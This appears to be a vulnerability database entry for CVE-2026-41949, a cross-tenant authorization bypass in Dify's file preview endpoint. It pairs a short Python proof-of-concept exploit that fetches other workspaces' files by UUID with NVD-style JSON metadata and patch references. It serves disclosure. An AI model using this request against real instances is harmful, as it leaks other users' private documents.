CVE-2026-41949

import requests # Target URL configuration target_host = "https://target-dify-instance.com" # Step 1: Authentication # Note: Dify Cloud allows unauthenticated self-registration. # The attacker creates an account to obtain a valid session cookie or token. session = requests.Session() # login_data = {"email": "[email protected]", "password": "attacker_password"} # session.post(f"{target_host}/console/api/auth/login", json=login_data) # Step 2: Identify Target File UUID # The attacker intercepts a file UUID belonging to another tenant/workspace. # This UUID can be found in browser network traffic or API responses. victim_file_uuid = "uuid-of-the-target-file-here" # Step 3: Exploit Authorization Bypass # Construct the request to the vulnerable preview endpoint. # The system fails to check if the current user owns this file_id. poc_url = f"{target_host}/console/api/files/{victim_file_uuid}/preview" response = session.get(poc_url) # Step 4: Verify Exploitation if response.status_code == 200: print("[+] Exploit successful!") print(f"[+] Leaked content (first 3000 chars):\n{response.text}") else: print("[-] Failed to retrieve file.")

{"cve": {"id": "CVE-2026-41949", "sourceIdentifier": "[email protected]", "published": "2026-05-18T15:16:26.137", "lastModified": "2026-05-19T19:24:21.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dify version 1.14.1 and prior contain an authorization bypass vulnerability in the file preview endpoint that allows any authenticated user to read up to 3,000 characters of any uploaded document across all tenants and workspaces using only the file's UUID. Attackers can access the /console/api/files/{file_id}/preview endpoint with an intercepted file UUID to extract sensitive content from documents without ownership or workspace permission verification. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dify:dify:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.14.1", "matchCriteriaId": "A125CFA5-D056-4A11-8EE1-0B5FC5628CF3"}]}]}], "references": [{"url": "https://github.com/langgenius/dify/pull/35797", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Mitigation"]}, {"url": "https://huntr.com/bounties/d50a0240-7951-4939-b989-9bded66c7682", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/dify-authorization-bypass-via-file-preview-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}